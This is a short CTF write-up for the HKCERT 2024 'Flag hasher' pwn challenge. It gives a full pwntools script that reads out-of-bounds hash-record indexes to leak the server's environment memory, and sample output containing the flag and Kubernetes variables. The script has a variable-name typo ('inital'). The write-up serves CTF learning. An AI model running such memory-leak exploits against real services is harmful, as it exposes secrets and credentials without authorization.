As this chall already has an official writeup](https://hackmd.io/@blackb6a/hkcert-ctf-2024-ii-en-07128acbc80dd0a4#Pwn-Flag-hasher), please consider this page as some notes to make the payload

1 - Looping the connection

  • index for a linear lookup of the memory’s contents
  • while loop checking if an error occurs
    • if it occurs, stops some time before reconnecting

2 - Converting the received hash

pretty straightforward, but there are some pitfalls to avoid due to python’s handling of the bytes type:

  • convert each segment of two bytes to an int, from a base 16 representation
  • using ord, encoded with the chrmap encoding to avoid some shenigans

3 - Final exploit

from pwn import *
import time

r = remote("c55-flag-hasher.hkcert24.pwnable.hk", 1337, ssl=True) 
context.log_level = "critical" # use "debug" for a better understanding of the payload

initial = 150 # starts from this index
idx = initial

def hex_to_ascii(b: bytes) -> bytes:
    intarr = []
    for i in range(0,len(b),2):
        x = int(b[i:i+2],16)
        intarr.append(x)
    res = b''
    for x in intarr:
        res += chr(x).encode('charmap')
    return res

while idx < inital+50: # tries 50 indexes before stopping
    try:
        r.recvuntil(b"2 - Read Hash record\n") # wait until we receive this text... which is when we need to response
        r.sendline(b'2')                       # and send the command
        r.recvuntil(b"Idx: ")
        r.sendline(str(idx).encode())          # convert `idx` to string, and send it
        idx+=1
        server_response = r.recvline()         # save server response to variable
        hex_output = server_response.split(b" : ")[1].rstrip() # get only the hex part out of the server response
        # print("---",hex_output)
        decrypted = hex_to_ascii(hex_output)
        print("---",decrypted)
    except:
        print("--- server response:",server_response)
        sleep(1) # avoids overloading the server with requests, or gettings us banned
        r = remote("c55-flag-hasher.hkcert24.pwnable.hk", 1337, ssl=True)

An extract of what you get by executing it:

--- server response: b'Hash - 180 : Segmentation fault\n'
--- b'/home/pwn/chal\x00KUBERNETES_PORT=\x00'
--- server response: b'Entry does not exist.\n'
--- b'KUBERNETES_PORT=\x00KUBERNETES_SERV'
--- b'KUBERNETES_SERVICE_PORT=\x00REMOTE_'
--- b'REMOTE_HOST=10.29.213.112\x00HOSTNA'
--- b'HOSTNAME=chall-0\x00HOME=/root\x00flag'
--- b'HOME=/root\x00flag=hkcert24{A_tRap_'
--- b'flag=hkcert24{A_tRap_1n_1ibC}\x00KU'
--- b'KUBERNETES_PORT_443_TCP_ADDR=\x00PA'
--- b'PATH=/usr/local/sbin:/usr/local/'
--- b'KUBERNETES_PORT_443_TCP_PORT=\x00KU'
--- b'KUBERNETES_PORT_443_TCP_PROTO=\x00K'
--- b'KUBERNETES_SERVICE_PORT_HTTPS=\x00K'
--- b'KUBERNETES_PORT_443_TCP=\x00KUBERNE'
--- b'KUBERNETES_SERVICE_HOST=\x00PWD=/\x00/'
--- server response: b'Hash - 196 : 5057443D2F002F686F6D652F70776E2F6368616C000000000000000000Segmentation fault\n'
--- server response: b'Entry does not exist.\n'

Please do not hesitate reaching to me if you have any questions, suggestions or improvements.